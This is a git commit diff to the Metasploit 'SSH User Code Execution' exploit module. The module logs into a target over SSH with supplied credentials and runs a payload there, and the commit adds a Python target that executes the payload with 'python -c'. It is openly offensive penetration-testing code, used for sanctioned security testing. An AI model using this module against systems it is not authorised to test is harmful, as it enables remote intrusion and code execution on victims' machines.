Land #5833, sshexec improvements

2015-08-13 14:16:22 -05:00 · 2015-08-13 14:16:22 -05:00 · 605a14350f
parent 677ec341dd 3bd6c4cee4
commit 605a14350f
1 changed files with 37 additions and 25 deletions
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@ -15,56 +15,62 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize
    super(
-      'Name'        => 'SSH User Code Execution',
-      'Description' => %q{
-        This module utilizes a stager to upload a base64 encoded
-        binary which is then decoded, chmod'ed and executed from
-        the command shell.
+      'Name'             => 'SSH User Code Execution',
+      'Description'      => %q{
+        This module connects to the target system and executes the necessary
+        commands to run the specified payload via SSH. If a native payload is
+        specified, an appropriate stager will be used.
      },
-      'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
-      'References'  =>
+      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
+      'References'       =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
-      'License'     => MSF_LICENSE,
-      'Privileged'  => true,
-      'DefaultOptions' =>
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'DefaultOptions'   =>
        {
-          'PrependFork' => 'true',
-          'EXITFUNC' => 'process'
+          'PrependFork'  => 'true',
+          'EXITFUNC'     => 'process'
        },
-      'Payload'     =>
+      'Payload'          =>
        {
-          'Space'    => 4096,
-          'BadChars' => "",
-          'DisableNops' => true
+          'Space'        => 4096,
+          'BadChars'     => "",
+          'DisableNops'  => true
        },
-      'Platform'    => %w{ linux osx },
-      'Targets'     =>
+      'Platform'         => %w{ linux osx python },
+      'Targets'          =>
        [
          [ 'Linux x86',
            {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Linux x64',
            {
-              'Arch' => ARCH_X86_64,
+              'Arch'     => ARCH_X86_64,
              'Platform' => 'linux'
            }
          ],
          [ 'OSX x86',
            {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
              'Platform' => 'osx'
            }
+          ],
+          [ 'Python',
+            {
+              'Arch'     => ARCH_PYTHON,
+              'Platform' => 'python'
+            }
          ]
        ],
-      'CmdStagerFlavor' => %w{ bourne echo printf },
-      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'  => %w{ bourne echo printf },
+      'DefaultTarget'    => 0,
      # For the CVE
-      'DisclosureDate' => 'Jan 01 1999'
+      'DisclosureDate'   => 'Jan 01 1999'
    )

    register_options(
@ -128,6 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
    do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
-    execute_cmdstager({:linemax => 500})
+    if target['Platform'] == 'python'
+      execute_command("python -c \"#{payload.encoded}\"")
+    else
+      execute_cmdstager({:linemax => 500})
+    end
+
+    self.ssh_socket.close
  end
 end